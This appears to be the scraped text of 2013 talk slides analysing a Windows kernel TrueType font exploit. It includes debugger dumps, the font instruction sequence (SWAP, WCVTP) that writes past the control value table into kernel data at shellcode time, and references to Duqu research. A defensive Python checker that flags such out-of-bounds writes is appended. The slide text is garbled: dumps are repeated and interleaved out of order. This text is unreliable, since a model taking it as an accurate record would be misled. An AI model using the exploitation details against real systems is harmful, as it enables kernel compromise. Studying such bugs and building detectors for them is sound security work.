    Resetting default scope

    kd> dd e2481f84 L100
    e2481f84 e2481afc e2481f00 e2481f80 00030004
    e2481f94 00040000 00000000 00000000 00000000
    ...
    e2482024 00000000 bf85bd4b bf85bd4b e2482368
    e2482034 e24bdbb3 0000000d e2482318 0003b89b
lea ecx, [eax+100h] call dword ptr [eax+0ACh] mov [esi+8], eax Debugging Details: -----------------00157: SWAP 00158: WCVTP BUGCHECK_STR: 0x7f_8 ; Stack: e2482368, 0x2c ; ControlValueTable[0x2c] TSS: 00000028 -- (.tss 0x28) eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 =esi=e2481fe0 edi=01 [EAX+0xAC] “SSW()” eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00 [CVT]=[GlobalGS-4] e2482368 e8fbffffff call e2482368 Resetting default scope e2481f80 00000000 [CVT+(4*2C)] = kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+0xB0] = e2481f94 00040000 00000000 00000000 00000000 [GlobalGS+0xB0-4] = ... e2482024 00000000 bf85bd4b bf85bd4b e2482368 [GlobalGS+0xAC] = e2482034 e24bdbb3 0000000d e2482318 0003b89b Friday, March 8, 2013 ; __fastcall itrp_LSW(x, x) ;... lea ecx, [eax+100h] call dword ptr [eax+0ACh] mov [esi+8], eax Debugging Details: -----------------00157: SWAP 00158: WCVTP BUGCHECK_STR: 0x7f_8 [CVT+(4*(2C+3))] + 0x50 ; Stack: e2482368, 0x2c ; ControlValueTable[0x2c] TSS: 00000028 -- (.tss 0x28) eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 =esi=e2481fe0 edi=01 [EAX+0xAC] “SSW()” eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up ei ng nz ac cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00 [CVT]=[GlobalGS-4] e2482368 e8fbffffff call e2482368 Resetting default scope e2481f80 00000000 [CVT+(4*2C)] = kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+0xB0] = e2481f94 00040000 00000000 00000000 00000000 [GlobalGS+0xB0-4] = ... e2482024 00000000 bf85bd4b bf85bd4b e2482368 [GlobalGS+0xAC] = e2482034 e24bdbb3 0000000d e2482318 0003b89b *fpgm Friday, March 8, 2013 Friday, March 8, 2013 References Friday, March 8, 2013 TrueType Font Stuff • Apple’s Developer Website • Microsoft’s Developer Website • Possibly Adobe’s web site if you’re lucky (most links seem to be broken currently) • Wikipedia, Google, you know... 
Friday, March 8, 2013 Other People’s Stuff, Which I Just Found • Lee Ling Chuan, and Chan Lee Yee Black-Hat Europe 2012, and PacSec Oct 2012 “GDI Font Fuzzing in Windows Kernel for Fun” • Ivan Teblin Virus Bulletin, Dallas, 05 Oct 2012 “Anatomy of Duqu exploit” Friday, March 8, 2013 Oh yeah, by the way, for reference, this is the storage area array. The RS(0) and WS(0) were the loop iteration offset walking through CVT. It was 0x2C at crash (shellcode) time. kd> dd e2481f00 e2481f00 0000002c e2481f10 00000000 e2481f20 00000000 e2481f30 00000000 e2481f40 00000000 e2481f50 00000000 e2481f60 00000000 Friday, March 8, 2013 bf85bd4b 00000000 00000000 00000000 00000000 00000000 00000000 bf85bd4b 00000000 00000000 00000000 00000000 00000000 00000000 bf85bd4b 00000000 00000000 00000000 00000000 00000000 00000000 Oh yeah, by the way, for reference, this is the storage area array. The RS(0) and WS(0) were the loop iteration offset walking through CVT. It was 0x2C at crash (shellcode) time. kd> dd e2481f00 e2481f00 0000002c bf85bd4b bf85bd4b bf85bd4b e2481f10 00000000 00000000 00000000 00000000 e2481f20 00000000 Debugging00000000 Details:00000000 00000000 e2481f30 00000000 00000000 00000000 00000000 -----------------e2481f40 00000000 00000000 00000000 00000000 e2481f50 00000000 00000000 00000000 00000000 BUGCHECK_STR: 0x7f_8 e2481f60 00000000 00000000 00000000 00000000 TSS: 00000028 -- (.tss 0x28) eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e24 eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0 nv up cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 e2482368 e8fbffffff call e2482368 Resetting default scope e2481f80 00000000 kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 e2481f94 00040000 00000000 00000000 00000000 Friday, March 8, 2013 ...
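The root of the sequence above is a CVT write whose index (0x2C, read back from storage slot 0) reaches past the control value table into GlobalGS. As an added example, not code from the talk, here is a Python checker that decodes an fpgm/prep byte stream, tracks statically known pushed values and storage-area reads, and flags WCVTP/WCVTF writes whose index falls outside the table; the sample program bytes, the storage contents and the CVT size are constructed for illustration, and the checker only models the handful of opcodes the talk's sequence uses.

```python
# Added example (not the talk's code): static check of a TrueType fpgm/prep program for CVT writes past the table.
PUSHB0, PUSHW0, NPUSHB, NPUSHW = 0xB0, 0xB8, 0x40, 0x41  # opcode values from the TT spec
ADD, RS, WS, SWAP, WCVTP, WCVTF, SSW = 0x60, 0x43, 0x42, 0x23, 0x44, 0x70, 0x1F
PUSH_OPS = set(range(PUSHB0, PUSHW0 + 8)) | {NPUSHB, NPUSHW}
UNKNOWN = None  # marks a stack slot whose value is not statically known

def decode(program):
    """Yield (offset, opcode, inline operands) for each instruction in the byte string."""
    i = 0
    while i < len(program):
        op, start, args, i = program[i], i, [], i + 1
        if PUSHB0 <= op <= PUSHB0 + 7 or op == NPUSHB:    # unsigned bytes follow
            cnt, i = (program[i], i + 1) if op == NPUSHB else (op - PUSHB0 + 1, i)
            args, i = list(program[i:i + cnt]), i + cnt
        elif PUSHW0 <= op <= PUSHW0 + 7 or op == NPUSHW:   # signed big-endian words follow
            cnt, i = (program[i], i + 1) if op == NPUSHW else (op - PUSHW0 + 1, i)
            args = [int.from_bytes(program[i + 2 * k:i + 2 * k + 2], "big", signed=True) for k in range(cnt)]
            i += 2 * cnt
        yield start, op, args

def find_cvt_overwrites(program, cvt_entries, storage=None):
    """Return [(offset, index)] for WCVTP/WCVTF whose known index is outside the CVT.
    storage: assumed storage-area contents (slot -> value) when the program starts."""
    stack, hits, storage = [], [], dict(storage or {})
    pop = lambda: stack.pop() if stack else UNKNOWN
    for off, op, args in decode(program):
        if op in PUSH_OPS:
            stack.extend(args)
        elif op == ADD:
            b, a = pop(), pop()
            stack.append(UNKNOWN if UNKNOWN in (a, b) else a + b)
        elif op == RS:                        # storage read; the talk's RS(0) yielded 0x2C
            stack.append(storage.get(pop(), UNKNOWN))
        elif op == WS:
            value, slot = pop(), pop()
            storage[slot] = value
        elif op == SWAP:
            stack[-2:] = stack[-2:][::-1]
        elif op in (WCVTP, WCVTF):            # value is popped first, then the CVT index
            value, index = pop(), pop()
            if index is not UNKNOWN and not 0 <= index < cvt_entries:
                hits.append((off, index))
        elif op == SSW:
            pop()
        else:
            stack.clear()                     # unmodelled opcode: stop trusting the stack
    return hits

# Constructed program mirroring the talk's sequence: ADD, PUSHB 0, RS, SWAP, WCVTP, PUSHB 1, SSW.
SAMPLE = bytes([0xB8, 0x12, 0x34, 0xB0, 0x10, 0x60, 0xB0, 0x00, 0x43, 0x23, 0x44, 0xB0, 0x01, 0x1F])
```

With a 16-entry CVT and storage slot 0 holding 0x2C, `find_cvt_overwrites(SAMPLE, 16, {0: 0x2C})` reports the WCVTP at offset 10 writing index 0x2C; without the storage assumption the index is untracked and nothing is reported.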